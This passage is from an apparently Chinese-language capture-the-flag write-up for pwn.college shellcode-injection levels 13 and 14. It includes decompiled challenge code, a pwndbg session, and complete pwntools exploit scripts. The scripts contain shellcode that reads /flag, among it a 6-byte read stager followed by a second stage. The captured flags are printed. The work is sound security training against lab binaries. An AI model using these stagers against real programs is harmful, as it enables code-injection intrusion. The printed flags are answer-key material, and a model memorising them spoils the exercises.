HOST, PORT = "localhost", 1337
9

10
gdbscript = """
11
c
12
"""
13

14

15
def launch(local=True, debug=False, aslr=False, argv=None, envp=None):
16
    if local:
17
        elf = ELF(FILE)
18
        context.binary = elf
19

20
        if debug:
21
            return gdb.debug(
22
                [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp
23
            )
24
        else:
25
            return process([elf.path] + (argv or []), env=envp)
26
    else:
27
        return remote(HOST, PORT)
28

29

30
def send_payload(target, payload):
31
    try:
32
        target.send(payload)
33
    except Exception as e:
34
        log.exception(f"An error occurred while sending payload: {e}")
35

36

37
def construct_payload():
38
    shellcode = """
39
    /* execve(path='a', argv=0, envp=0) */
40
    /* push b'a\x00' */
41
    push 0x61
42
    mov rdi, rsp
43
    xor esi, esi
44
    cdq
45
    /* call execve() */
46
    mov al, 59 /* 0x3b */
47
    syscall
48
    """
49

50
    return asm(shellcode)
51

52

53
def attack(target, payload):
54
    try:
55
        send_payload(target, payload)
56

57
        response = target.recvall(timeout=5)
58

59
        return b"pwn.college{" in response
60
    except Exception as e:
61
        log.exception(f"An error occurred while performing attack: {e}")
62

63

64
def main():
65
    try:
66
        target = launch()
67
        payload = construct_payload()
68

69
        if attack(target, payload):
70
            log.success("Success! Exiting...")
71

72
            pause()
73
            exit()
74
    except Exception as e:
75
        log.exception(f"An error occurred in main: {e}")
76

77

78
if __name__ == "__main__":
79
    main()

我们的 shellcode 的目的就是加载外部脚本完成剩余攻击步骤。注意把下面脚本编译为 a（文件名）。

1
#include <fcntl.h>
2
#include <sys/sendfile.h>
3

4
int main() {
5
  sendfile(1, open("/flag", O_RDONLY), 0, 0x1000);
6

7
  return 0;
8
}

Flag#

Flag: pwn.college{g4UdtC88x4ayx2CjkFQNdxcSBsC.0FOyIDL5cTNxgzW}

Level 13#

Information#

Category: Pwn

Description#

Write and execute shellcode to read the flag, but this time you only get 12 bytes!

Write-up#


35 collapsed lines
1
int __fastcall main(int argc, const char **argv, const char **envp)
2
{
3
  size_t v3; // rax
4
  size_t v4; // rax
5
  int fd; // [rsp+2Ch] [rbp-14h]
6
  const char **i; // [rsp+30h] [rbp-10h]
7
  const char **j; // [rsp+38h] [rbp-8h]
8

9
  setvbuf(stdin, 0LL, 2, 0LL);
10
  setvbuf(_bss_start, 0LL, 2, 0LL);
11
  puts("###");
12
  printf("### Welcome to %s!\n", *argv);
13
  puts("###");
14
  putchar(10);
15
  puts(
16
    "This challenge reads in some bytes, modifies them (depending on the specific challenge configuration), and executes them");
17
  puts(
18
    "as code! This is a common exploitation scenario, called `code injection`. Through this series of challenges, you will");
19
  puts(
20
    "practice your shellcode writing skills under various constraints! To ensure that you are shellcoding, rather than doing");
21
  puts("other tricks, this will sanitize all environment variables and arguments and close all file descriptors > 2.\n");
22
  for ( fd = 3; fd <= 9999; ++fd )
23
    close(fd);
24
  for ( i = argv; *i; ++i )
25
  {
26
    v3 = strlen(*i);
27
    memset((void *)*i, 0, v3);
28
  }
29
  for ( j = envp; *j; ++j )
30
  {
31
    v4 = strlen(*j);
32
    memset((void *)*j, 0, v4);
33
  }
34
  shellcode = mmap((void *)0x2A318000, 0x1000uLL, 7, 34, 0, 0LL);
35
  if ( shellcode != (void *)707887104 )
36
    __assert_fail("shellcode == (void *)0x2a318000", "/challenge/babyshell-level-13.c", 0x62u, "main");
37
  printf("Mapped 0x1000 bytes for shellcode at %p!\n", (const void *)0x2A318000);
38
  puts("Reading 0xc bytes from stdin.\n");
39
  shellcode_size = read(0, shellcode, 0xCuLL);
40
  if ( !shellcode_size )
41
    __assert_fail("shellcode_size > 0", "/challenge/babyshell-level-13.c", 0x67u, "main");
42
  puts("Removing write permissions from first 4096 bytes of shellcode.\n");
7 collapsed lines
43
  if ( mprotect(shellcode, 0x1000uLL, 5) )
44
    __assert_fail(
45
      "mprotect(shellcode, 4096, PROT_READ|PROT_EXEC) == 0",
46
      "/challenge/babyshell-level-13.c",
47
      0x6Au,
48
      "main");
49
  puts("This challenge is about to execute the following shellcode:\n");
50
  print_disassembly(shellcode, shellcode_size);
51
  puts(&byte_251D);
52
  puts("Executing shellcode!\n");
53
  ((void (*)(void))shellcode)();
54
  puts("### Goodbye!");
55
  return 0;
56
}

12 bytes 是吧，巧了，哥们上一个 exp 就压在 12 bytes 上了。

Exploit#

1
#!/usr/bin/python3
2

3
from pwn import ELF, asm, context, gdb, log, pause, process, remote
4

5
context(log_level="debug", terminal="kitty")
6

7
FILE = "./babyshell-level-13"
8
HOST, PORT = "localhost", 1337
9

10
gdbscript = """
11
c
12
"""
13

14

15
def launch(local=True, debug=False, aslr=False, argv=None, envp=None):
16
    if local:
17
        elf = ELF(FILE)
18
        context.binary = elf
19

20
        if debug:
21
            return gdb.debug(
22
                [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp
23
            )
24
        else:
25
            return process([elf.path] + (argv or []), env=envp)
26
    else:
27
        return remote(HOST, PORT)
28

29

30
def send_payload(target, payload):
31
    try:
32
        target.send(payload)
33
    except Exception as e:
34
        log.exception(f"An error occurred while sending payload: {e}")
35

36

37
def construct_payload():
38
    shellcode = """
39
    /* execve(path='a', argv=0, envp=0) */
40
    /* push b'a\x00' */
41
    push 0x61
42
    mov rdi, rsp
43
    xor esi, esi
44
    cdq
45
    /* call execve() */
46
    mov al, 59 /* 0x3b */
47
    syscall
48
    """
49

50
    return asm(shellcode)
51

52

53
def attack(target, payload):
54
    try:
55
        send_payload(target, payload)
56

57
        response = target.recvall(timeout=5)
58

59
        return b"pwn.college{" in response
60
    except Exception as e:
61
        log.exception(f"An error occurred while performing attack: {e}")
62

63

64
def main():
65
    try:
66
        target = launch()
67
        payload = construct_payload()
68

69
        if attack(target, payload):
70
            log.success("Success! Exiting...")
71

72
            pause()
73
            exit()
74
    except Exception as e:
75
        log.exception(f"An error occurred in main: {e}")
76

77

78
if __name__ == "__main__":
79
    main()

Flag#

Flag: pwn.college{s_8hupYRZPagLrq6OX3Dd--4PYY.0VOyIDL5cTNxgzW}

Level 14#

Information#

Category: Pwn

Description#

Write and execute shellcode to read the flag, but this time you only get 6 bytes :)

Write-up#


35 collapsed lines
1
int __fastcall main(int argc, const char **argv, const char **envp)
2
{
3
  size_t v3; // rax
4
  size_t v4; // rax
5
  int fd; // [rsp+2Ch] [rbp-14h]
6
  const char **i; // [rsp+30h] [rbp-10h]
7
  const char **j; // [rsp+38h] [rbp-8h]
8

9
  setvbuf(stdin, 0LL, 2, 0LL);
10
  setvbuf(_bss_start, 0LL, 2, 0LL);
11
  puts("###");
12
  printf("### Welcome to %s!\n", *argv);
13
  puts("###");
14
  putchar(10);
15
  puts(
16
    "This challenge reads in some bytes, modifies them (depending on the specific challenge configuration), and executes them");
17
  puts(
18
    "as code! This is a common exploitation scenario, called `code injection`. Through this series of challenges, you will");
19
  puts(
20
    "practice your shellcode writing skills under various constraints! To ensure that you are shellcoding, rather than doing");
21
  puts("other tricks, this will sanitize all environment variables and arguments and close all file descriptors > 2.\n");
22
  for ( fd = 3; fd <= 9999; ++fd )
23
    close(fd);
24
  for ( i = argv; *i; ++i )
25
  {
26
    v3 = strlen(*i);
27
    memset((void *)*i, 0, v3);
28
  }
29
  for ( j = envp; *j; ++j )
30
  {
31
    v4 = strlen(*j);
32
    memset((void *)*j, 0, v4);
33
  }
34
  shellcode = mmap((void *)0x2C0A3000, 0x1000uLL, 7, 34, 0, 0LL);
35
  if ( shellcode != (void *)738865152 )
36
    __assert_fail("shellcode == (void *)0x2c0a3000", "/challenge/babyshell-level-14.c", 0x62u, "main");
37
  printf("Mapped 0x1000 bytes for shellcode at %p!\n", (const void *)0x2C0A3000);
38
  puts("Reading 0x6 bytes from stdin.\n");
39
  shellcode_size = read(0, shellcode, 6uLL);
40
  if ( !shellcode_size )
41
    __assert_fail("shellcode_size > 0", "/challenge/babyshell-level-14.c", 0x67u, "main");
42
  puts("This challenge is about to execute the following shellcode:\n");
43
  print_disassembly(shellcode, shellcode_size);
44
  puts(&byte_24A5);
45
  puts("Executing shellcode!\n");
46
  ((void (*)(void))shellcode)();
47
  puts("### Goodbye!");
48
  return 0;
49
}

6 bytes，看似好像是一件不可能完成的任务，butttt，如果你尝试动态调试会就会发现，rax 的值正好可以用于 syscall 来调用 read；rdx 的值正好可以用做 read 的第二个参数，指定 buf 地址；rsi 的值足够大，正好用作 read 的第三个参数，指定输入大小。

pwndbg> disass main
Dump of assembler code for function main:
131 collapsed lines
   0x0000000000001547 <+0>: endbr64
   0x000000000000154b <+4>: push   rbp
   0x000000000000154c <+5>: mov    rbp,rsp
   0x000000000000154f <+8>: sub    rsp,0x40
   0x0000000000001553 <+12>: mov    DWORD PTR [rbp-0x24],edi
   0x0000000000001556 <+15>: mov    QWORD PTR [rbp-0x30],rsi
   0x000000000000155a <+19>: mov    QWORD PTR [rbp-0x38],rdx
   0x000000000000155e <+23>: mov    rax,QWORD PTR [rip+0x2abb]        # 0x4020 <stdin@@GLIBC_2.2.5>
   0x0000000000001565 <+30>: mov    ecx,0x0
   0x000000000000156a <+35>: mov    edx,0x2
   0x000000000000156f <+40>: mov    esi,0x0
   0x0000000000001574 <+45>: mov    rdi,rax
   0x0000000000001577 <+48>: call   0x11d0 <setvbuf@plt>
   0x000000000000157c <+53>: mov    rax,QWORD PTR [rip+0x2a8d]        # 0x4010 <stdout@@GLIBC_2.2.5>
   0x0000000000001583 <+60>: mov    ecx,0x0
   0x0000000000001588 <+65>: mov    edx,0x2
   0x000000000000158d <+70>: mov    esi,0x0
   0x0000000000001592 <+75>: mov    rdi,rax
   0x0000000000001595 <+78>: call   0x11d0 <setvbuf@plt>
   0x000000000000159a <+83>: lea    rdi,[rip+0xc24]        # 0x21c5
   0x00000000000015a1 <+90>: call   0x1130 <puts@plt>
   0x00000000000015a6 <+95>: mov    rax,QWORD PTR [rbp-0x30]
   0x00000000000015aa <+99>: mov    rax,QWORD PTR [rax]
   0x00000000000015ad <+102>: mov    rsi,rax
   0x00000000000015b0 <+105>: lea    rdi,[rip+0xc12]        # 0x21c9
   0x00000000000015b7 <+112>: mov    eax,0x0
   0x00000000000015bc <+117>: call   0x1170 <printf@plt>
   0x00000000000015c1 <+122>: lea    rdi,[rip+0xbfd]        # 0x21c5
   0x00000000000015c8 <+129>: call   0x1130 <puts@plt>
   0x00000000000015cd <+134>: mov    edi,0xa
   0x00000000000015d2 <+139>: call   0x1120 <putchar@plt>
   0x00000000000015d7 <+144>: lea    rdi,[rip+0xc02]        # 0x21e0
   0x00000000000015de <+151>: call   0x1130 <puts@plt>
   0x00000000000015e3 <+156>: lea    rdi,[rip+0xc76]        # 0x2260
   0x00000000000015ea <+163>: call   0x1130 <puts@plt>
   0x00000000000015ef <+168>: lea    rdi,[rip+0xce2]        # 0x22d8
   0x00000000000015f6 <+175>: call   0x1130 <puts@plt>
   0x00000000000015fb <+180>: lea    rdi,[rip+0xd4e]        # 0x2350
   0x0000000000001602 <+187>: call   0x1130 <puts@plt>
   0x0000000000001607 <+192>: mov    DWORD PTR [rbp-0x14],0x3
   0x000000000000160e <+199>: jmp    0x161e <main+215>
   0x0000000000001610 <+201>: mov    eax,DWORD PTR [rbp-0x14]
   0x0000000000001613 <+204>: mov    edi,eax
   0x0000000000001615 <+206>: call   0x11a0 <close@plt>
   0x000000000000161a <+211>: add    DWORD PTR [rbp-0x14],0x1
   0x000000000000161e <+215>: cmp    DWORD PTR [rbp-0x14],0x270f
   0x0000000000001625 <+222>: jle    0x1610 <main+201>
   0x0000000000001627 <+224>: mov    rax,QWORD PTR [rbp-0x30]
   0x000000000000162b <+228>: mov    QWORD PTR [rbp-0x10],rax
   0x000000000000162f <+232>: jmp    0x165c <main+277>
   0x0000000000001631 <+234>: mov    rax,QWORD PTR [rbp-0x10]
   0x0000000000001635 <+238>: mov    rax,QWORD PTR [rax]
   0x0000000000001638 <+241>: mov    rdi,rax
   0x000000000000163b <+244>: call   0x1150 <strlen@plt>
   0x0000000000001640 <+249>: mov    rdx,rax
   0x0000000000001643 <+252>: mov    rax,QWORD PTR [rbp-0x10]
   0x0000000000001647 <+256>: mov    rax,QWORD PTR [rax]
   0x000000000000164a <+259>: mov    esi,0x0
   0x000000000000164f <+264>: mov    rdi,rax
   0x0000000000001652 <+267>: call   0x1190 <memset@plt>
   0x0000000000001657 <+272>: add    QWORD PTR [rbp-0x10],0x8
   0x000000000000165c <+277>: mov    rax,QWORD PTR [rbp-0x10]
   0x0000000000001660 <+281>: mov    rax,QWORD PTR [rax]
   0x0000000000001663 <+284>: test   rax,rax
   0x0000000000001666 <+287>: jne    0x1631 <main+234>
   0x0000000000001668 <+289>: mov    rax,QWORD PTR [rbp-0x38]
   0x000000000000166c <+293>: mov    QWORD PTR [rbp-0x8],rax
   0x0000000000001670 <+297>: jmp    0x169d <main+342>
   0x0000000000001672 <+299>: mov    rax,QWORD PTR [rbp-0x8]
   0x0000000000001676 <+303>: mov    rax,QWORD PTR [rax]
   0x0000000000001679 <+306>: mov    rdi,rax
   0x000000000000167c <+309>: call   0x1150 <strlen@plt>
   0x0000000000001681 <+314>: mov    rdx,rax
   0x0000000000001684 <+317>: mov    rax,QWORD PTR [rbp-0x8]
   0x0000000000001688 <+321>: mov    rax,QWORD PTR [rax]
   0x000000000000168b <+324>: mov    esi,0x0
   0x0000000000001690 <+329>: mov    rdi,rax
   0x0000000000001693 <+332>: call   0x1190 <memset@plt>
   0x0000000000001698 <+337>: add    QWORD PTR [rbp-0x8],0x8
   0x000000000000169d <+342>: mov    rax,QWORD PTR [rbp-0x8]
   0x00000000000016a1 <+346>: mov    rax,QWORD PTR [rax]
   0x00000000000016a4 <+349>: test   rax,rax
   0x00000000000016a7 <+352>: jne    0x1672 <main+299>
   0x00000000000016a9 <+354>: mov    r9d,0x0
   0x00000000000016af <+360>: mov    r8d,0x0
   0x00000000000016b5 <+366>: mov    ecx,0x22
   0x00000000000016ba <+371>: mov    edx,0x7
   0x00000000000016bf <+376>: mov    esi,0x1000
   0x00000000000016c4 <+381>: mov    edi,0x2c0a3000
   0x00000000000016c9 <+386>: call   0x1160 <mmap@plt>
   0x00000000000016ce <+391>: mov    QWORD PTR [rip+0x2963],rax        # 0x4038 <shellcode>
   0x00000000000016d5 <+398>: mov    rax,QWORD PTR [rip+0x295c]        # 0x4038 <shellcode>
   0x00000000000016dc <+405>: cmp    rax,0x2c0a3000
   0x00000000000016e2 <+411>: je     0x1703 <main+444>
   0x00000000000016e4 <+413>: lea    rcx,[rip+0xdde]        # 0x24c9 <__PRETTY_FUNCTION__.25265>
   0x00000000000016eb <+420>: mov    edx,0x62
   0x00000000000016f0 <+425>: lea    rsi,[rip+0xcc9]        # 0x23c0
   0x00000000000016f7 <+432>: lea    rdi,[rip+0xce2]        # 0x23e0
   0x00000000000016fe <+439>: call   0x1180 <__assert_fail@plt>
   0x0000000000001703 <+444>: mov    rax,QWORD PTR [rip+0x292e]        # 0x4038 <shellcode>
   0x000000000000170a <+451>: mov    rsi,rax
   0x000000000000170d <+454>: lea    rdi,[rip+0xcec]        # 0x2400
   0x0000000000001714 <+461>: mov    eax,0x0
   0x0000000000001719 <+466>: call   0x1170 <printf@plt>
   0x000000000000171e <+471>: lea    rdi,[rip+0xd0b]        # 0x2430
   0x0000000000001725 <+478>: call   0x1130 <puts@plt>
   0x000000000000172a <+483>: mov    rax,QWORD PTR [rip+0x2907]        # 0x4038 <shellcode>
   0x0000000000001731 <+490>: mov    edx,0x6
   0x0000000000001736 <+495>: mov    rsi,rax
   0x0000000000001739 <+498>: mov    edi,0x0
   0x000000000000173e <+503>: call   0x11b0 <read@plt>
   0x0000000000001743 <+508>: mov    QWORD PTR [rip+0x28e6],rax        # 0x4030 <shellcode_size>
   0x000000000000174a <+515>: mov    rax,QWORD PTR [rip+0x28df]        # 0x4030 <shellcode_size>
   0x0000000000001751 <+522>: test   rax,rax
   0x0000000000001754 <+525>: jne    0x1775 <main+558>
   0x0000000000001756 <+527>: lea    rcx,[rip+0xd6c]        # 0x24c9 <__PRETTY_FUNCTION__.25265>
   0x000000000000175d <+534>: mov    edx,0x67
   0x0000000000001762 <+539>: lea    rsi,[rip+0xc57]        # 0x23c0
   0x0000000000001769 <+546>: lea    rdi,[rip+0xcdf]        # 0x244f
   0x0000000000001770 <+553>: call   0x1180 <__assert_fail@plt>
   0x0000000000001775 <+558>: lea    rdi,[rip+0xcec]        # 0x2468
   0x000000000000177c <+565>: call   0x1130 <puts@plt>
   0x0000000000001781 <+570>: mov    rdx,QWORD PTR [rip+0x28a8]        # 0x4030 <shellcode_size>
   0x0000000000001788 <+577>: mov    rax,QWORD PTR [rip+0x28a9]        # 0x4038 <shellcode>
   0x000000000000178f <+584>: mov    rsi,rdx
   0x0000000000001792 <+587>: mov    rdi,rax
   0x0000000000001795 <+590>: call   0x12e9 <print_disassembly>
   0x000000000000179a <+595>: lea    rdi,[rip+0xd04]        # 0x24a5
   0x00000000000017a1 <+602>: call   0x1130 <puts@plt>
   0x00000000000017a6 <+607>: lea    rdi,[rip+0xcf9]        # 0x24a6
   0x00000000000017ad <+614>: call   0x1130 <puts@plt>
   0x00000000000017b2 <+619>: mov    rax,QWORD PTR [rip+0x287f]        # 0x4038 <shellcode>
   0x00000000000017b9 <+626>: mov    rdx,rax
   0x00000000000017bc <+629>: mov    eax,0x0
   0x00000000000017c1 <+634>: call   rdx
   0x00000000000017c3 <+636>: lea    rdi,[rip+0xcf2]        # 0x24bc
   0x00000000000017ca <+643>: call   0x1130 <puts@plt>
   0x00000000000017cf <+648>: mov    eax,0x0
2 collapsed lines
   0x00000000000017d4 <+653>: leave
   0x00000000000017d5 <+654>: ret
End of assembler dump.
pwndbg> b *main+634
Breakpoint 1 at 0x17c1
pwndbg> r
27 collapsed lines
Starting program: /home/cub3y0nd/Projects/pwn.college/babyshell-level-14
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/usr/lib/libthread_db.so.1".
###
### Welcome to /home/cub3y0nd/Projects/pwn.college/babyshell-level-14!
###

This challenge reads in some bytes, modifies them (depending on the specific challenge configuration), and executes them
as code! This is a common exploitation scenario, called `code injection`. Through this series of challenges, you will
practice your shellcode writing skills under various constraints! To ensure that you are shellcoding, rather than doing
other tricks, this will sanitize all environment variables and arguments and close all file descriptors > 2.

Mapped 0x1000 bytes for shellcode at 0x2c0a3000!
Reading 0x6 bytes from stdin.


This challenge is about to execute the following shellcode:

ERROR: Failed to disassemble shellcode! Bytes are:

      Address      |                      Bytes
--------------------------------------------------------------------
0x000000002c0a3000 | 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Executing shellcode!


Breakpoint 1, 0x0000614116b287c1 in main ()
LEGEND: STACK | HEAP | CODE | DATA | WX | RODATA
─────────────────[ REGISTERS / show-flags off / show-compact-regs off ]──────────────────
 RAX  0
 RBX  0x7ffd5ec85d08 —▸ 0x7ffd5ec86c08 ◂— 0
 RCX  0x71ac56b1b7a4 (write+20) ◂— cmp rax, -0x1000 /* 'H=' */
 RDX  0x2c0a3000 ◂— 0xa /* '\n' */
 RDI  0x71ac56bf8710 ◂— 0
 RSI  0x71ac56bf7643 (_IO_2_1_stdout_+131) ◂— 0xbf8710000000000a /* '\n' */
 R8   0x614119b31010 ◂— 0
 R9   7
 R10  0x614119b312a0 ◂— 0x614119b31
 R11  0x202
 R12  1
 R13  0
 R14  0x71ac573d0000 (_rtld_global) —▸ 0x71ac573d12e0 —▸ 0x614116b27000 ◂— 0x10102464c457f
 R15  0
 RBP  0x7ffd5ec85be0 —▸ 0x7ffd5ec85c80 —▸ 0x7ffd5ec85ce0 ◂— 0
 RSP  0x7ffd5ec85ba0 ◂— 0
 RIP  0x614116b287c1 (main+634) ◂— call rdx
──────────────────────────[ DISASM / x86-64 / set emulate on ]───────────────────────────
 ► 0x614116b287c1 <main+634>              call   rdx                         <0x2c0a3000>

   0x614116b287c3 <main+636>              lea    rdi, [rip + 0xcf2]     RDI => 0x614116b294bc ◂— '### Goodbye!'
   0x614116b287ca <main+643>              call   puts@plt                    <puts@plt>
26 collapsed lines

   0x614116b287cf <main+648>              mov    eax, 0                      EAX => 0
   0x614116b287d4 <main+653>              leave
   0x614116b287d5 <main+654>              ret

   0x614116b287d6                         nop    word ptr cs:[rax + rax]
   0x614116b287e0 <__libc_csu_init>       endbr64
   0x614116b287e4 <__libc_csu_init+4>     push   r15
   0x614116b287e6 <__libc_csu_init+6>     lea    r15, [rip + 0x2553]         R15 => 0x614
116b2ad40 (__init_array_start) —▸ 0x614116b282e0 (frame_dummy) ◂— endbr64
   0x614116b287ed <__libc_csu_init+13>    push   r14
────────────────────────────────────────[ STACK ]────────────────────────────────────────
00:0000│ rsp 0x7ffd5ec85ba0 ◂— 0
01:0008│-038 0x7ffd5ec85ba8 —▸ 0x7ffd5ec85d18 —▸ 0x7ffd5ec86c3f ◂— 0
02:0010│-030 0x7ffd5ec85bb0 —▸ 0x7ffd5ec85d08 —▸ 0x7ffd5ec86c08 ◂— 0
03:0018│-028 0x7ffd5ec85bb8 ◂— 0x100000000
04:0020│-020 0x7ffd5ec85bc0 ◂— 0
05:0028│-018 0x7ffd5ec85bc8 ◂— 0x2710573b83e0
06:0030│-010 0x7ffd5ec85bd0 —▸ 0x7ffd5ec85d10 ◂— 0
07:0038│-008 0x7ffd5ec85bd8 —▸ 0x7ffd5ec85df0 ◂— 0
──────────────────────────────────────[ BACKTRACE ]──────────────────────────────────────
 ► 0   0x614116b287c1 main+634
   1   0x71ac56a34e08
   2   0x71ac56a34ecc __libc_start_main+140
   3   0x614116b2822e _start+46
─────────────────────────────────────────────────────────────────────────────────────────
pwndbg> ni

Program received signal SIGSEGV, Segmentation fault.
0x000000002c0a3000 in ?? ()
LEGEND: STACK | HEAP | CODE | DATA | WX | RODATA
───────────────────────────────────────────────────────────[ REGISTERS / show-flags off / show-compact-regs off ]───────────────────────────────────────────────────────────
 RAX  0
 RBX  0x7ffd5ec85d08 —▸ 0x7ffd5ec86c08 ◂— 0
 RCX  0x71ac56b1b7a4 (write+20) ◂— cmp rax, -0x1000 /* 'H=' */
 RDX  0x2c0a3000 ◂— 0xa /* '\n' */
 RDI  0x71ac56bf8710 ◂— 0
 RSI  0x71ac56bf7643 (_IO_2_1_stdout_+131) ◂— 0xbf8710000000000a /* '\n' */
 R8   0x614119b31010 ◂— 0
 R9   7
 R10  0x614119b312a0 ◂— 0x614119b31
 R11  0x202
 R12  1
 R13  0
 R14  0x71ac573d0000 (_rtld_global) —▸ 0x71ac573d12e0 —▸ 0x614116b27000 ◂— 0x10102464c457f
 R15  0
 RBP  0x7ffd5ec85be0 —▸ 0x7ffd5ec85c80 —▸ 0x7ffd5ec85ce0 ◂— 0
*RSP  0x7ffd5ec85b98 —▸ 0x614116b287c3 (main+636) ◂— lea rdi, [rip + 0xcf2]
*RIP  0x2c0a3000 ◂— 0xa /* '\n' */
────────────────────────────────────────────────────────────────────[ DISASM / x86-64 / set emulate on ]────────────────────────────────────────────────────────────────────
 ► 0x2c0a3000    or     al, byte ptr [rax]
   0x2c0a3002    add    byte ptr [rax], al
   0x2c0a3004    add    byte ptr [rax], al
   0x2c0a3006    add    byte ptr [rax], al
23 collapsed lines
   0x2c0a3008    add    byte ptr [rax], al
   0x2c0a300a    add    byte ptr [rax], al
   0x2c0a300c    add    byte ptr [rax], al
   0x2c0a300e    add    byte ptr [rax], al
   0x2c0a3010    add    byte ptr [rax], al
   0x2c0a3012    add    byte ptr [rax], al
   0x2c0a3014    add    byte ptr [rax], al
─────────────────────────────────────────────────────────────────────────────────[ STACK ]──────────────────────────────────────────────────────────────────────────────────
00:0000│ rsp 0x7ffd5ec85b98 —▸ 0x614116b287c3 (main+636) ◂— lea rdi, [rip + 0xcf2]
01:0008│-040 0x7ffd5ec85ba0 ◂— 0
02:0010│-038 0x7ffd5ec85ba8 —▸ 0x7ffd5ec85d18 —▸ 0x7ffd5ec86c3f ◂— 0
03:0018│-030 0x7ffd5ec85bb0 —▸ 0x7ffd5ec85d08 —▸ 0x7ffd5ec86c08 ◂— 0
04:0020│-028 0x7ffd5ec85bb8 ◂— 0x100000000
05:0028│-020 0x7ffd5ec85bc0 ◂— 0
06:0030│-018 0x7ffd5ec85bc8 ◂— 0x2710573b83e0
07:0038│-010 0x7ffd5ec85bd0 —▸ 0x7ffd5ec85d10 ◂— 0
───────────────────────────────────────────────────────────────────────────────[ BACKTRACE ]────────────────────────────────────────────────────────────────────────────────
 ► 0       0x2c0a3000
   1   0x614116b287c3 main+636
   2   0x71ac56a34e08
   3   0x71ac56a34ecc __libc_start_main+140
   4   0x614116b2822e _start+46
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
pwndbg>

来来来，我们看看 stage_1 的 shellcode 编译出来占多少字节：

1
.global _start
2
.intel_syntax noprefix
3

4
_start:
5
  xor edi, edi
6
  xchg esi, edx
7
  syscall

1
0000000000401000 <_start>:
2
  401000:       31 ff                   xor    edi,edi
3
  401002:       87 d6                   xchg   esi,edx
4
  401004:       0f 05                   syscall

GG 正好 6 bytes！笑不动了哈哈哈。

现在，有了 stage_1 的辅助，stage_2 该怎么办不用多说了吧 xD

唯一有一点需要注意的就是执行 stage_2 之前应该使用 nop 填充 stage_1 所用的所有指令位，这样才能确保从正确的地方接着执行，因为 rip 的值一直在改变。

Exploit#

1
#!/usr/bin/python3
2

3
from pwn import ELF, asm, context, gdb, log, pause, process, remote, shellcraft
4

5
context(log_level="debug", terminal="kitty")
6

7
FILE = "./babyshell-level-14"
8
HOST, PORT = "localhost", 1337
9

10
gdbscript = """
11
c
12
"""
13

14

15
def launch(local=True, debug=False, aslr=False, argv=None, envp=None):
16
    if local:
17
        elf = ELF(FILE)
18
        context.binary = elf
19

20
        if debug:
21
            return gdb.debug(
22
                [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp
23
            )
24
        else:
25
            return process([elf.path] + (argv or []), env=envp)
26
    else:
27
        return remote(HOST, PORT)
28

29

30
def send_payload(target, payload):
31
    try:
32
        target.send(payload)
33
    except Exception as e:
34
        log.exception(f"An error occurred while sending payload: {e}")
35

36

37
def construct_payload(stage):
38
    stage_1 = """
39
    xor edi, edi
40
    xchg esi, edx
41
    syscall
42
    """
43

44
    stage_2 = shellcraft.nop() * len(asm(stage_1))
45
    stage_2 += shellcraft.cat("/flag")
46

47
    if stage == 1:
48
        return asm(stage_1)
49
    elif stage == 2:
50
        return asm(stage_2)
51
    else:
52
        log.failure("Unknown stage number.")
53

54

55
def attack(target, payload):
56
    try:
57
        send_payload(target, payload)
58

59
        response = target.recvall(timeout=5)
60

61
        return b"pwn.college{" in response
62
    except Exception as e:
63
        log.exception(f"An error occurred while performing attack: {e}")
64

65

66
def main():
67
    try:
68
        target = launch()
69
        payload = construct_payload(1)
70

71
        send_payload(target, payload)
72

73
        payload = construct_payload(2)
74

75
        if attack(target, payload):
76
            log.success("Success! Exiting...")
77

78
            pause()
79
            exit()
80
    except Exception as e:
81
        log.exception(f"An error occurred in main: {e}")
82

83

84
if __name__ == "__main__":
85
    main()

Flag#

Flag: pwn.college{0PaZanWijSYussIikuZaDrCAj1-.0FMzIDL5cTNxgzW}

后记#

没想到时隔三天又要写后记了。这章 3 天就打完了，爽快！

~~Shellcode Injection 应该是最简单的一章了，不接受反驳。~~

Well. 接下来我想嗨几天，虽然不知道可以干什么，但是我清楚的知道我这个小苦逼之后的 roadmap 是刷 ROP -> FmtStr ……